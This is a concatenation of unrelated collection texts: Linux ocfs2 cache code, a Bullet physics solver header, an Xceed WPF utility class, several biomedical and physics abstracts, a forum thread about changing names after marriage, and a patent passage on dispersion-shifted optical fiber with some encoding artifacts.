in case of error. * * The co_cache_lock() must be held. */ static void ocfs2_expand_cache(struct ocfs2_caching_info *ci, struct ocfs2_meta_cache_item **tree) { int i; mlog_bug_on_msg(ci->ci_num_cached != OCFS2_CACHE_INFO_MAX_ARRAY, "Owner %llu, num cached = %u, should be %u\n", (unsigned long long)ocfs2_metadata_cache_owner(ci), ci->ci_num_cached, OCFS2_CACHE_INFO_MAX_ARRAY); mlog_bug_on_msg(!(ci->ci_flags & OCFS2_CACHE_FL_INLINE), "Owner %llu not marked as inline anymore!\n", (unsigned long long)ocfs2_metadata_cache_owner(ci)); /* Be careful to initialize the tree members *first* because * once the ci_tree is used, the array is junk... */ for (i = 0; i < OCFS2_CACHE_INFO_MAX_ARRAY; i++) tree[i]->c_block = ci->ci_cache.ci_array[i]; ci->ci_flags &= ~OCFS2_CACHE_FL_INLINE; ci->ci_cache.ci_tree = RB_ROOT; /* this will be set again by __ocfs2_insert_cache_tree */ ci->ci_num_cached = 0; for (i = 0; i < OCFS2_CACHE_INFO_MAX_ARRAY; i++) { __ocfs2_insert_cache_tree(ci, tree[i]); tree[i] = NULL; } trace_ocfs2_expand_cache( (unsigned long long)ocfs2_metadata_cache_owner(ci), ci->ci_flags, ci->ci_num_cached); } /* Slow path function - memory allocation is necessary. See the * comment above ocfs2_set_buffer_uptodate for more information. */ static void __ocfs2_set_buffer_uptodate(struct ocfs2_caching_info *ci, sector_t block, int expand_tree) { int i; struct ocfs2_meta_cache_item *new = NULL; struct ocfs2_meta_cache_item *tree[OCFS2_CACHE_INFO_MAX_ARRAY] = { NULL, }; trace_ocfs2_set_buffer_uptodate( (unsigned long long)ocfs2_metadata_cache_owner(ci), (unsigned long long)block, expand_tree); new = kmem_cache_alloc(ocfs2_uptodate_cachep, GFP_NOFS); if (!new) { mlog_errno(-ENOMEM); return; } new->c_block = block; if (expand_tree) { /* Do *not* allocate an array here - the removal code * has no way of tracking that. */ for (i = 0; i < OCFS2_CACHE_INFO_MAX_ARRAY; i++) { tree[i] = kmem_cache_alloc(ocfs2_uptodate_cachep, GFP_NOFS); if (!tree[i]) { mlog_errno(-ENOMEM); goto out_free; } /* These are initialized in ocfs2_expand_cache! */ } } ocfs2_metadata_cache_lock(ci); if (ocfs2_insert_can_use_array(ci)) { /* Ok, items were removed from the cache in between * locks. Detect this and revert back to the fast path */ ocfs2_append_cache_array(ci, block); ocfs2_metadata_cache_unlock(ci); goto out_free; } if (expand_tree) ocfs2_expand_cache(ci, tree); __ocfs2_insert_cache_tree(ci, new); ocfs2_metadata_cache_unlock(ci); new = NULL; out_free: if (new) kmem_cache_free(ocfs2_uptodate_cachep, new); /* If these were used, then ocfs2_expand_cache re-set them to * NULL for us. */ if (tree[0]) { for (i = 0; i < OCFS2_CACHE_INFO_MAX_ARRAY; i++) if (tree[i]) kmem_cache_free(ocfs2_uptodate_cachep, tree[i]); } } /* Item insertion is guarded by co_io_lock(), so the insertion path takes * advantage of this by not rechecking for a duplicate insert during * the slow case. Additionally, if the cache needs to be bumped up to * a tree, the code will not recheck after acquiring the lock -- * multiple paths cannot be expanding to a tree at the same time. * * The slow path takes into account that items can be removed * (including the whole tree wiped and reset) when this process it out * allocating memory. In those cases, it reverts back to the fast * path. * * Note that this function may actually fail to insert the block if * memory cannot be allocated. This is not fatal however (but may * result in a performance penalty) * * Readahead buffers can be passed in here before the I/O request is * completed. */ void ocfs2_set_buffer_uptodate(struct ocfs2_caching_info *ci, struct buffer_head *bh) { int expand; /* The block may very well exist in our cache already, so avoid * doing any more work in that case. */ if (ocfs2_buffer_cached(ci, bh)) return; trace_ocfs2_set_buffer_uptodate_begin( (unsigned long long)ocfs2_metadata_cache_owner(ci), (unsigned long long)bh->b_blocknr); /* No need to recheck under spinlock - insertion is guarded by * co_io_lock() */ ocfs2_metadata_cache_lock(ci); if (ocfs2_insert_can_use_array(ci)) { /* Fast case - it's an array and there's a free * spot. */ ocfs2_append_cache_array(ci, bh->b_blocknr); ocfs2_metadata_cache_unlock(ci); return; } expand = 0; if (ci->ci_flags & OCFS2_CACHE_FL_INLINE) { /* We need to bump things up to a tree. */ expand = 1; } ocfs2_metadata_cache_unlock(ci); __ocfs2_set_buffer_uptodate(ci, bh->b_blocknr, expand); } /* Called against a newly allocated buffer. Most likely nobody should * be able to read this sort of metadata while it's still being * allocated, but this is careful to take co_io_lock() anyway. */ void ocfs2_set_new_buffer_uptodate(struct ocfs2_caching_info *ci, struct buffer_head *bh) { /* This should definitely *not* exist in our cache */ BUG_ON(ocfs2_buffer_cached(ci, bh)); set_buffer_uptodate(bh); ocfs2_metadata_cache_io_lock(ci); ocfs2_set_buffer_uptodate(ci, bh); ocfs2_metadata_cache_io_unlock(ci); } /* Requires ip_lock. */ static void ocfs2_remove_metadata_array(struct ocfs2_caching_info *ci, int index) { sector_t *array = ci->ci_cache.ci_array; int bytes; BUG_ON(index < 0 || index >= OCFS2_CACHE_INFO_MAX_ARRAY); BUG_ON(index >= ci->ci_num_cached); BUG_ON(!ci->ci_num_cached); trace_ocfs2_remove_metadata_array( (unsigned long long)ocfs2_metadata_cache_owner(ci), index, ci->ci_num_cached); ci->ci_num_cached--; /* don't need to copy if the array is now empty, or if we * removed at the tail */ if (ci->ci_num_cached && index < ci->ci_num_cached) { bytes = sizeof(sector_t) * (ci->ci_num_cached - index); memmove(&array[index], &array[index + 1], bytes); } } /* Requires ip_lock. */ static void ocfs2_remove_metadata_tree(struct ocfs2_caching_info *ci, struct ocfs2_meta_cache_item *item) { trace_ocfs2_remove_metadata_tree( (unsigned long long)ocfs2_metadata_cache_owner(ci), (unsigned long long)item->c_block); rb_erase(&item->c_node, &ci->ci_cache.ci_tree); ci->ci_num_cached--; } static void ocfs2_remove_block_from_cache(struct ocfs2_caching_info *ci, sector_t block) { int index; struct ocfs2_meta_cache_item *item = NULL; ocfs2_metadata_cache_lock(ci); trace_ocfs2_remove_block_from_cache( (unsigned long long)ocfs2_metadata_cache_owner(ci), (unsigned long long) block, ci->ci_num_cached, ci->ci_flags); if (ci->ci_flags & OCFS2_CACHE_FL_INLINE) { index = ocfs2_search_cache_array(ci, block); if (index != -1) ocfs2_remove_metadata_array(ci, index); } else { item = ocfs2_search_cache_tree(ci, block); if (item) ocfs2_remove_metadata_tree(ci, item); } ocfs2_metadata_cache_unlock(ci); if (item) kmem_cache_free(ocfs2_uptodate_cachep, item); } /* * Called when we remove a chunk of metadata from an inode. We don't * bother reverting things to an inlined array in the case of a remove * which moves us back under the limit. */ void ocfs2_remove_from_cache(struct ocfs2_caching_info *ci, struct buffer_head *bh) { sector_t block = bh->b_blocknr; ocfs2_remove_block_from_cache(ci, block); } /* Called when we remove xattr clusters from an inode. */ void ocfs2_remove_xattr_clusters_from_cache(struct ocfs2_caching_info *ci, sector_t block, u32 c_len) { struct super_block *sb = ocfs2_metadata_cache_get_super(ci); unsigned int i, b_len = ocfs2_clusters_to_blocks(sb, 1) * c_len; for (i = 0; i < b_len; i++, block++) ocfs2_remove_block_from_cache(ci, block); } int __init init_ocfs2_uptodate_cache(void) { ocfs2_uptodate_cachep = kmem_cache_create("ocfs2_uptodate", sizeof(struct ocfs2_meta_cache_item), 0, SLAB_HWCACHE_ALIGN, NULL); if (!ocfs2_uptodate_cachep) return -ENOMEM; return 0; } void exit_ocfs2_uptodate_cache(void) { if (ocfs2_uptodate_cachep) kmem_cache_destroy(ocfs2_uptodate_cachep); }
{ "pile_set_name": "Github" }
Rosiglitazone/Metformin. The thiazolidinedione rosiglitazone and the biguanide metformin are effective antihyperglycaemic agents with different modes of action; rosiglitazone primarily increases insulin sensitivity, whereas metformin primarily reduces hepatic glucose output. Antihyperglycaemic combination therapy is often required to achieve effective glycaemic control. A fixed-dose formulation of rosiglitazone/metformin was recently approved in the EU and the US for the treatment of type 2 diabetes mellitus in patients inadequately controlled on metformin monotherapy. Bioequivalence between the fixed-dose combination tablet and coadministration of rosiglitazone with metformin at the same dosage has been established in a pharmacokinetic study. Fixed-dose rosiglitazone/metformin 8 mg/2g per day reduced glycosylated haemoglobin (HbA1c) and fasting plasma glucose (FPG) levels to a significantly greater extent than metformin 3 g/day in patients with type 2 diabetes in a 24-week, randomised, double-blind study. Rosiglitazone plus metformin was significantly more effective than metformin alone at reducing HbA1c and FPG levels in patients with type 2 diabetes in three 26-week, randomised, double-blind, placebo-controlled studies. Rosiglitazone plus metformin was generally well tolerated in all studies and had a tolerability profile similar to that of metformin monotherapy. Mild or moderate symptomatic hypoglycaemia was reported in <or=4.4% of rosiglitazone plus metformin recipients.
{ "pile_set_name": "PubMed Abstracts" }
/* Bullet Continuous Collision Detection and Physics Library Copyright (c) 2003-2006 Erwin Coumans http://continuousphysics.com/Bullet/ This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. */ #ifndef BT_SEQUENTIAL_IMPULSE_CONSTRAINT_SOLVER_MT_H #define BT_SEQUENTIAL_IMPULSE_CONSTRAINT_SOLVER_MT_H #include "btSequentialImpulseConstraintSolver.h" #include "btBatchedConstraints.h" #include "LinearMath/btThreads.h" /// /// btSequentialImpulseConstraintSolverMt /// /// A multithreaded variant of the sequential impulse constraint solver. The constraints to be solved are grouped into /// batches and phases where each batch of constraints within a given phase can be solved in parallel with the rest. /// Ideally we want as few phases as possible, and each phase should have many batches, and all of the batches should /// have about the same number of constraints. /// This method works best on a large island of many constraints. /// /// Supports all of the features of the normal sequential impulse solver such as: /// - split penetration impulse /// - rolling friction /// - interleaving constraints /// - warmstarting /// - 2 friction directions /// - randomized constraint ordering /// - early termination when leastSquaresResidualThreshold is satisfied /// /// When the SOLVER_INTERLEAVE_CONTACT_AND_FRICTION_CONSTRAINTS flag is enabled, unlike the normal SequentialImpulse solver, /// the rolling friction is interleaved as well. /// Interleaving the contact penetration constraints with friction reduces the number of parallel loops that need to be done, /// which reduces threading overhead so it can be a performance win, however, it does seem to produce a less stable simulation, /// at least on stacks of blocks. /// /// When the SOLVER_RANDMIZE_ORDER flag is enabled, the ordering of phases, and the ordering of constraints within each batch /// is randomized, however it does not swap constraints between batches. /// This is to avoid regenerating the batches for each solver iteration which would be quite costly in performance. /// /// Note that a non-zero leastSquaresResidualThreshold could possibly affect the determinism of the simulation /// if the task scheduler's parallelSum operation is non-deterministic. The parallelSum operation can be non-deterministic /// because floating point addition is not associative due to rounding errors. /// The task scheduler can and should ensure that the result of any parallelSum operation is deterministic. /// ATTRIBUTE_ALIGNED16(class) btSequentialImpulseConstraintSolverMt : public btSequentialImpulseConstraintSolver { public: virtual void solveGroupCacheFriendlySplitImpulseIterations(btCollisionObject * *bodies, int numBodies, btPersistentManifold** manifoldPtr, int numManifolds, btTypedConstraint** constraints, int numConstraints, const btContactSolverInfo& infoGlobal, btIDebugDraw* debugDrawer) BT_OVERRIDE; virtual btScalar solveSingleIteration(int iteration, btCollisionObject** bodies, int numBodies, btPersistentManifold** manifoldPtr, int numManifolds, btTypedConstraint** constraints, int numConstraints, const btContactSolverInfo& infoGlobal, btIDebugDraw* debugDrawer) BT_OVERRIDE; virtual btScalar solveGroupCacheFriendlySetup(btCollisionObject * *bodies, int numBodies, btPersistentManifold** manifoldPtr, int numManifolds, btTypedConstraint** constraints, int numConstraints, const btContactSolverInfo& infoGlobal, btIDebugDraw* debugDrawer) BT_OVERRIDE; virtual btScalar solveGroupCacheFriendlyFinish(btCollisionObject * *bodies, int numBodies, const btContactSolverInfo& infoGlobal) BT_OVERRIDE; // temp struct used to collect info from persistent manifolds into a cache-friendly struct using multiple threads struct btContactManifoldCachedInfo { static const int MAX_NUM_CONTACT_POINTS = 4; int numTouchingContacts; int solverBodyIds[2]; int contactIndex; int rollingFrictionIndex; bool contactHasRollingFriction[MAX_NUM_CONTACT_POINTS]; btManifoldPoint* contactPoints[MAX_NUM_CONTACT_POINTS]; }; // temp struct used for setting up joint constraints in parallel struct JointParams { int m_solverConstraint; int m_solverBodyA; int m_solverBodyB; }; void internalInitMultipleJoints(btTypedConstraint * *constraints, int iBegin, int iEnd); void internalConvertMultipleJoints(const btAlignedObjectArray<JointParams>& jointParamsArray, btTypedConstraint** constraints, int iBegin, int iEnd, const btContactSolverInfo& infoGlobal); // parameters to control batching static bool s_allowNestedParallelForLoops; // whether to allow nested parallel operations static int s_minimumContactManifoldsForBatching; // don't even try to batch if fewer manifolds than this static btBatchedConstraints::BatchingMethod s_contactBatchingMethod; static btBatchedConstraints::BatchingMethod s_jointBatchingMethod; static int s_minBatchSize; // desired number of constraints per batch static int s_maxBatchSize; protected: static const int CACHE_LINE_SIZE = 64; btBatchedConstraints m_batchedContactConstraints; btBatchedConstraints m_batchedJointConstraints; int m_numFrictionDirections; bool m_useBatching; bool m_useObsoleteJointConstraints; btAlignedObjectArray<btContactManifoldCachedInfo> m_manifoldCachedInfoArray; btAlignedObjectArray<int> m_rollingFrictionIndexTable; // lookup table mapping contact index to rolling friction index btSpinMutex m_bodySolverArrayMutex; char m_antiFalseSharingPadding[CACHE_LINE_SIZE]; // padding to keep mutexes in separate cachelines btSpinMutex m_kinematicBodyUniqueIdToSolverBodyTableMutex; btAlignedObjectArray<char> m_scratchMemory; virtual void randomizeConstraintOrdering(int iteration, int numIterations); virtual btScalar resolveAllJointConstraints(int iteration); virtual btScalar resolveAllContactConstraints(); virtual btScalar resolveAllContactFrictionConstraints(); virtual btScalar resolveAllContactConstraintsInterleaved(); virtual btScalar resolveAllRollingFrictionConstraints(); virtual void setupBatchedContactConstraints(); virtual void setupBatchedJointConstraints(); virtual void convertJoints(btTypedConstraint * *constraints, int numConstraints, const btContactSolverInfo& infoGlobal) BT_OVERRIDE; virtual void convertContacts(btPersistentManifold * *manifoldPtr, int numManifolds, const btContactSolverInfo& infoGlobal) BT_OVERRIDE; virtual void convertBodies(btCollisionObject * *bodies, int numBodies, const btContactSolverInfo& infoGlobal) BT_OVERRIDE; int getOrInitSolverBodyThreadsafe(btCollisionObject & body, btScalar timeStep); void allocAllContactConstraints(btPersistentManifold * *manifoldPtr, int numManifolds, const btContactSolverInfo& infoGlobal); void setupAllContactConstraints(const btContactSolverInfo& infoGlobal); void randomizeBatchedConstraintOrdering(btBatchedConstraints * batchedConstraints); public: BT_DECLARE_ALIGNED_ALLOCATOR(); btSequentialImpulseConstraintSolverMt(); virtual ~btSequentialImpulseConstraintSolverMt(); btScalar resolveMultipleJointConstraints(const btAlignedObjectArray<int>& consIndices, int batchBegin, int batchEnd, int iteration); btScalar resolveMultipleContactConstraints(const btAlignedObjectArray<int>& consIndices, int batchBegin, int batchEnd); btScalar resolveMultipleContactSplitPenetrationImpulseConstraints(const btAlignedObjectArray<int>& consIndices, int batchBegin, int batchEnd); btScalar resolveMultipleContactFrictionConstraints(const btAlignedObjectArray<int>& consIndices, int batchBegin, int batchEnd); btScalar resolveMultipleContactRollingFrictionConstraints(const btAlignedObjectArray<int>& consIndices, int batchBegin, int batchEnd); btScalar resolveMultipleContactConstraintsInterleaved(const btAlignedObjectArray<int>& contactIndices, int batchBegin, int batchEnd); void internalCollectContactManifoldCachedInfo(btContactManifoldCachedInfo * cachedInfoArray, btPersistentManifold * *manifoldPtr, int numManifolds, const btContactSolverInfo& infoGlobal); void internalAllocContactConstraints(const btContactManifoldCachedInfo* cachedInfoArray, int numManifolds); void internalSetupContactConstraints(int iContactConstraint, const btContactSolverInfo& infoGlobal); void internalConvertBodies(btCollisionObject * *bodies, int iBegin, int iEnd, const btContactSolverInfo& infoGlobal); void internalWriteBackContacts(int iBegin, int iEnd, const btContactSolverInfo& infoGlobal); void internalWriteBackJoints(int iBegin, int iEnd, const btContactSolverInfo& infoGlobal); void internalWriteBackBodies(int iBegin, int iEnd, const btContactSolverInfo& infoGlobal); }; #endif //BT_SEQUENTIAL_IMPULSE_CONSTRAINT_SOLVER_MT_H
{ "pile_set_name": "Github" }
Good Manufacturing Practice. Environmental requirements. What does Good Manufacturing Practice, GMP, mean in terms of Central service organisation? It can be seen as embodying all aspects which cover the quality, safety and performance of articles that will either be produced or reprocessed, for use in the care of patients.
{ "pile_set_name": "PubMed Abstracts" }
After marriage. SO and I have decided on Oct 30th to get married. We ARE doing the court house wedding, for now. We're trying to keep it all within $100-150 price range, since we have a lot of other things that need to be paid as well. So my question is. what all will I need to change after we are married? Driver's license, SS card... ? what else? Over here, you can re-register the birth of your children if you are marrying their father so that your married name appears on their birth certificates. I forgot to change my paypal account and changed my bank details and started wondering why it wasn't working. All bills need changing, your name at your doctor's and dentist's offices. Any savings for your children that you are the guardian of. Membership and/or advantage cards. Just 2 bills, which are in my name. I own my car, so would all that need changed for my title ? or is that what car notes mean? sorry, I'm new to all of this. As for bank account, he doesn't have one. all his places of employment have used the payroll cards. so it's just my account. <blockquote><b>Quoting 2+ Courtney:</b>" We don't really have anything. Just 2 bills, which are in my name. I own my car, so would all that ... [snip!] ... As for bank account, he doesn't have one. all his places of employment have used the payroll cards. so it's just my account."</blockquote> Anything financial that your maiden name is on will need to be changed. If you change it on one, you need to change it on all. Having a dl with your married name will cause issues if your bank account is in your maiden name. It all needs to match or it will cause you headaches.
{ "pile_set_name": "Pile-CC" }
Analysis of HHV-6 mutations in solid organ transplant recipients at the onset of cytomegalovirus disease and following treatment with intravenous ganciclovir or oral valganciclovir. Human herpesvirus 6 (HHV-6) and human cytomegalovirus (HCMV) are major opportunistic pathogens in solid organ transplant (SOT) recipients. The use of antivirals for the treatment of HCMV disease can result in the development of drug resistance mutations in HCMV and also potentially in HHV-6. The emergence of HHV-6 drug resistance mutations was evaluated in SOT recipients at the onset of HCMV disease and following treatment with ganciclovir (GCV) or valganciclovir (VGCV). Detection of HHV-6 was performed by real-time PCR from whole blood samples serially obtained from SOT recipients treated for HCMV disease with an induction dose of intravenous GCV or oral VGCV for 21 days followed by VGCV maintenance for 28 days in both arms. Baseline and last positive HHV-6 samples were tested for mutations in the genes encoding the protein kinase (U69) and the DNA polymerase (U38). The rate of HHV-6 viraemia among SOT patients with HCMV disease at baseline was 3.2% (5/155). All isolates belonged to the HHV-6B species. Mutations L213I and Y479H were detected at baseline and at later times in the U69 kinase. Mutation L213I was previously reported as polymorphism whereas the role of mutation Y479H in drug resistance is unknown. Mutations D854E and E855Q found in the DNA polymerase were known as natural variants. The incidence of HHV-6 viraemia in SOT recipients with established HCMV disease before initiation of antiviral therapy was low. Treatment with GCV or VGCV did not induce the emergence of HHV-6 drug resistance mutations.
{ "pile_set_name": "PubMed Abstracts" }
Running spell-check to identify regulatory variants. A major challenge in human genetics is pinpointing which non-coding genetic variants affect gene expression and disease risk. A new study in this issue describes a broadly applicable approach for this task that explicitly models cell type-specific regulatory motifs and generates variant effect predictions that are more accurate and interpretable than those of alternative tools.
{ "pile_set_name": "PubMed Abstracts" }
/************************************************************************************* Extended WPF Toolkit Copyright (C) 2007-2013 Xceed Software Inc. This program is provided to you under the terms of the Microsoft Public License (Ms-PL) as published at http://wpftoolkit.codeplex.com/license For more features, controls, and fast professional support, pick up the Plus Edition at http://xceed.com/wpf_toolkit Stay informed: follow @datagrid on Twitter or Like http://facebook.com/datagrids ***********************************************************************************/ using System; using System.Collections.Generic; using System.Linq; using System.Text; namespace Xceed.Wpf.Toolkit.Core.Utilities { internal static class DateTimeUtilities { public static DateTime GetContextNow( DateTimeKind kind ) { if( kind == DateTimeKind.Unspecified ) return DateTime.SpecifyKind( DateTime.Now, DateTimeKind.Unspecified ); return ( kind == DateTimeKind.Utc ) ? DateTime.UtcNow : DateTime.Now; } public static bool IsSameDate( DateTime? date1, DateTime? date2 ) { if( date1 == null || date2 == null ) return false; return ( date1.Value.Date == date2.Value.Date ); } } }
{ "pile_set_name": "Github" }
Measurements of X- and γ-ray emission probabilities in the β(-) decay of (233)Pa. X- and γ-ray emission probabilities from the β(-) decay of (233)Pa were measured with planar (LEPS) and coaxial Ge detectors. A (233)Pa source was produced after radiochemical separation from a (237)Np sample in which the parent ((237)Np) and daughter ((233)Pa) nuclides were in secular equilibrium. The results are compared with previous measurements and data evaluations.
{ "pile_set_name": "PubMed Abstracts" }
1. Field of the Invention The present invention relates to a single-mode optical fiber (hereinafter referred to as S-mode optical fiber) used for transmitting light in long-haul optical communications or the like and, in particular, to a dispersion-shifted fiber suitable for wavelength-multiplexing transmission. 2. Related Background Art Conventionally, optical communication systems employing a S-mode optical fiber as their transmission line have often utilized light in the wavelength band of 1.3 xcexcm or 1.55 xcexcm as their signal light for communications. Recently, in order to reduce transmission loss in the transmission line, the light in the wavelength band of 1.55 xcexcm has been in use more and more. The S-mode optical fiber employed in such a transmission line for light in the wavelength band of 1.55 xcexcm (hereinafter referred to as 1.55-xcexcm S-mode optical fiber) has been designed such that its wavelength dispersion (phenomenon in which pulse wave spreads due to the fact that velocity of propagation of light changes depending on its wavelength) is nullified (namely, to yield a dispersion-shifted fiber whose zero-dispersion wavelength is 1.55 xcexcm). For example, as such a dispersion-shifted fiber, Japanese Patent Publication No. 3-18161 discloses a dispersion-shifted fiber having a dual-shape core type refractive index profile in which a core is constituted by an inner core layer and an outer core layer having a refractive index lower than that of the inner core layer. Further, Japanese Patent Application Laid-Open No. 63-43107 and No. 2-141704 propose a dispersion-shifted fiber having a depressed cladding/dual-shape core type refractive index profile in which, in addition to the double core structure mentioned above, a cladding is constituted by an inner cladding layer and an outer cladding layer having a refractive index higher than that of the inner cladding layer. On the other hand, long-haul light transmission has recently become possible with the advent of wavelength division multiplex (WDM) transmission and optical amplifiers. Under such circumstances, however, influences of nonlinear optical effects cannot be neglected. Accordingly, in order to eliminate the nonlinear optical effects, it has been proposed to deform the refractive index profiles mentioned above, thereby shifting their zero-dispersion wavelength toward the shorter or longer wavelength side of their signal wavelength band (Japanese Patent Application Laid-Open No. 7-168046 and U.S. Pat. No. 5,483,612). Here, a nonlinear optical effect is a phenomenon in which a signal light pulse is distorted in proportion to density of light intensity or the like. This phenomenon becomes a factor restricting transmission speed, as well as a relay distance in a relaying transmission system. As a result of studies concerning the above-mentioned prior art, the inventors have discovered the following problems. Namely, in the above-mentioned dispersion-shifted fibers proposed for wavelength division multiplex transmission, the zero-dispersion wavelength is set to a level different from the wavelength level of signal wavelength band so as to restrain nonlinear optical effects from occurring, while their effective core cross-sectional area Aeff is set on the order of 55 xcexcm2. Though the conventional dispersion-shifted fibers for wavelength division multiplex transmission are sufficient for the conventional applications, it may be difficult for the prior art to keep a suitable transmission quality in the conventional transmission distance in view of further advance in wavelength multiplexing which will occur as communications become more sophisticated. Here, as disclosed in Japanese Patent Application Laid-Open No. 8-248251, effective core cross-sectional area Aeff is given by the following expression: A eff = 2 ⁢ xe2x80x83 ⁢ π ⁡ ( ∫ 0 ∞ ⁢ E 2 ⁢ r ⁢ xe2x80x83 ⁢ ⅆ r ) 2 / ( ∫ 0 ∞ ⁢ E 4 ⁢ r ⁢ xe2x80x83 ⁢ ⅆ r ) wherein E is an electric field accompanying propagated light, and r is a radial distance from a core center. It is an object of the present invention to provide a dispersion-shifted fiber which can effectively restrain the nonlinear optical effects from occurring, and is suitable for long-haul light transmission. The dispersion-shifted fiber according to the present invention is a S-mode optical fiber mainly composed of silica glass, whose zero-dispersion wavelength is shifted toward the shorter or longer wavelength side of a signal light wavelength band. The object to be transmitted through the dispersion-shifted fiber according to the present invention is at least one light component whose center wavelength is within the range of 1,500 to 1,600 nm (signal light wavelength band). In this specification, light in a 1.55-xcexcm wavelength band equals to light in the signal light wavelength band. The dispersion-shifted fiber has a zero-dispersion wavelength out of a wavelength band of 1.53 xcexcm (1,530 nm) to 1.56 xcexcm (1,560 nm) and has, as various characteristics at 1,550 nm, a dispersion level of 1.0 to 4.5 ps/nm/km in terms of absolute value, a dispersion slope not greater than 0.13 ps/nm2/km in terms of absolute value, an effective core cross-sectional area Aeff of 70 xcexcm2 or more, and a transmission loss not greater than 0.25 dB/km with respect to light in a wavelength band of 1.55 xcexcm. Here, when the dispersion level in terms of absolute value is smaller than 1.0 ps/nm/km, waveform distortion caused by four-wave mixing, unstable modulation, and the like cannot practically be neglected in long-haul light transmission over 20 km or more. When the dispersion level in terms of absolute value is greater than 4.5 ps/nm/km, by contrast, waveform distortion caused by wavelength dispersion and by self phase modulation cannot practically be neglected in long-haul light transmission over 20 km or more. In the dispersion-shifted fiber according to the present invention, the absolute value of dispersion slope is not greater than 0.13 ps/nm2/km. Accordingly, it is possible to transmit-signal lights in which the variation in the amount of waveform distortion due to the dispersion wavelength in signal lights is effectively decreased. The amount of nonlinear optical effects generated is in proportion to nonlinear optical effect constant (N2/Aeff). Accordingly, at the same propagating light condition, nonlinear optical effects are effectively restrained from occurring when the nonlinear optical effect constant (N2/Aeff) is made smaller. On the other hand, since nonlinear refractive index N2 is substantially defined by a main material of the optical fiber, it is difficult for the optical fiber made of the same main material to change the nonlinear refractive index N2 from its conventional level so as to restrain the nonlinear optical effects from occurring. Therefore, in the dispersion-shifted fiber according to the present invention, the effective core cross-sectional area Aeff is increased to 70 xcexcm2 or greater, thereby the amount of nonlinear optical effects generated becomes smaller than that of the conventional dispersion-shifted fiber by at least 20%. FIG. 1 is a graph showing a relationship between effective core cross-sectional area Aeff and nonlinear optical constant (N2/Aeff) in a dispersion-shifted fiber having a typical composition. From FIG. 1, it can be seen that nonlinear optical constant (N2/Aeff), which is 5.8xc3x9710xe2x88x9210 (1/W) when effective core cross-sectional area Aeff is 55 xcexcm2, becomes 4.6xc3x9710xe2x88x9210 (1/W) when effective core cross-sectional area Aeff is 70 xcexcm2, thus being reduced by about 20%. Accordingly, as compared with the conventional dispersion-shifted fiber, the dispersion-shifted fiber according to the present invention can increase the degree of wavelength multiplexing in signal light. In general, refractive index N of a medium under strong light changes depending on light intensity. Accordingly, the minimum order of effect on refractive index N is expressed by: N=N0N2xc2x7E2 wherein No is a linear refractive index, N2 is a nonlinear refractive index, and E is a field amplitude. Namely, under strong light, the refractive index N of the medium is given by the sum of No and an increase which is in proportion to the square of field amplitude E. In particular, the constant of proportion N2 (unit: m2/V2) in the second term is known as nonlinear refractive index. Since the distortion in signal light pulse is mainly influenced by, of nonlinear refractive indices, the nonlinear refractive index in the second term, nonlinear refractive index in this specification mainly refers to this second-order nonlinear refractive index. Also, in the dispersion-shifted fiber according to the present invention, since its incident signal light power can be increased by about 20% (about 1 dB) as compared with the conventional dispersion-shifted fiber, signal light can be transmitted over a transmission distance longer than that of the conventional fiber by 5 km when transmission loss is assumed to be 0.2 dB/km. As a result, in the case where the conventional repeater spacing is 50 km, for example, the number of repeaters can be reduced by about 10%. Further, the dispersion-shifted fiber according to the present invention has a bending loss of 0.5 dB/turn or less when bent at a diameter of 32 mm. Here, the bending loss is measured in a state where a fiber to be measured is wound around a mandrel having a diameter of 32 mm, and a value thus obtained is expressed per turn. In general, the greater is effective core cross-sectional area Aeff, the higher becomes the density of light intensity on the outer periphery side, thus yielding a greater bending loss. An optical fiber with a greater bending loss generates a greater optical loss due to the bending inevitably generated by cable-forming step, cable-laying step, excess-length processing upon connection, and the like. The dispersion-shifted fiber according to the present invention has a bending loss of 0.5 dB/turn or less when bent at a diameter of 32 mm, thereby effectively suppressing the optical loss caused by the bending generated at the cable-forming step or the like. Preferably, in the dispersion-shifted fiber according to the present invention, the absolute value of dispersion slope is 0.09 ps/nm2/km or more. The smaller the dispersion slope is, the less becomes the variation in the amount of waveform distortion caused by wavelength dispersion in the signal lights. On the other hand, the smaller the dispersion slope is, the more likely satisfied is a phase-matching condition for generating the four-wave mixing that is one of nonlinear optical phenomena. Therefore, in the dispersion-shifted fiber according to the present invention, the absolute value of dispersion slope is preferably at least 0.09 ps/nm2/km but not greater than 0.13 ps/nm2/km, so as to restrain not only the variation in the amount of waveform distortion caused by wavelength dispersion, but also the occurrence of the four-wave mixing, while the signal lights are transmitted. In order to realize the foregoing characteristics, the dispersion-shifted fiber according to the present invention can be realized by dual-shape core type or segmented-core type refractive index profile. Both refractive index profiles have a depressed cladding structure. Here, a first embodiment of the dispersion-shifted fiber according to the present invention has a depressed cladding/dual-shape core type refractive index profile. The first embodiment of the dispersion-shifted fiber comprises an inner core having a predetermined refractive index and an outside diameter of 2a; an outer core, disposed around the outer periphery of the inner core, having a refractive index lower than that of the inner core and an outside diameter of 2b; an inner cladding, disposed around the outer periphery of the outer core, having a refractive index lower than that of the outer core; and an outer cladding, disposed around the outer periphery of the inner cladding, having a refractive index higher than that of the inner cladding. According to the findings obtained by the inventors as a result of studies, when effective core cross-sectional area Aeff is increased in a dispersion-shifted fiber having a simple dual-shape core type refractive index profile without a depression cladding structure, namely, non-depressed cladding/dual-shape core type refractive index profile, in a state where its absolute value of dispersion is set to 1.0 to 4.5 ps/nm/km at the wavelength of 1,550 nm, its cutoff wavelength becomes shorter, and its bending loss increases. Even when the refractive index profile is adjusted to increase the cutoff wavelength in order to reduce the bending loss, due to the restriction that the cutoff wavelength must not exceed the signal light wavelength, the bending loss can not sufficiently be ameliorated. Also, according to the findings of the inventors, when the bending loss of a dispersion-shifted fiber having a depressed cladding/dual-shape core type refractive index is lower than that of a dispersion-shifted fiber having a simple dual-shape core type refractive index. Accordingly, an optical fiber (having a depressed cladding/dual-shape core type refractive index profile) employing the configuration mentioned above can favorably realize the foregoing various characteristics, and suppress the bending loss to a predetermined level or lower. Preferably, the first embodiment of the dispersion-shifted fiber satisfies the following relationships: a/bxe2x89xa60.15xe2x80x83xe2x80x83(1) 